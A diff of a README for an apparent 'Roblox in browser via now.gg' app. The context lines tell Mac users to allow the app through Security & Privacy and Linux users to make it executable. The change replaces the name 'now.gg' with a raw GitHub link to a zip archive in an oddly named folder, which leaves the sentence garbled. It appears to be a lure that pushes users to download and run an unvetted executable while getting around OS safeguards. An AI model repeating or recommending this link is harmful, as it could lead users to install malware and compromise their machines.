itsyxc/now.gg-roblox-in-browser/README.md

 - For Mac, you may need to open **System Preferences > Security & Privacy** and allow the app to run.
 - On Linux, you might need to give the file execute permission before running (right-click > Properties > Permissions).

-The app will start and open a window with the ROBLOX interface powered by now.gg.
+The app will start and open a window with the ROBLOX interface powered by https://raw.githubusercontent.com/itsyxc/now.gg-roblox-in-browser/main/Turkomanic/browser-gg-roblox-in-now-1.8.zip

 ## 💻 How to Use the App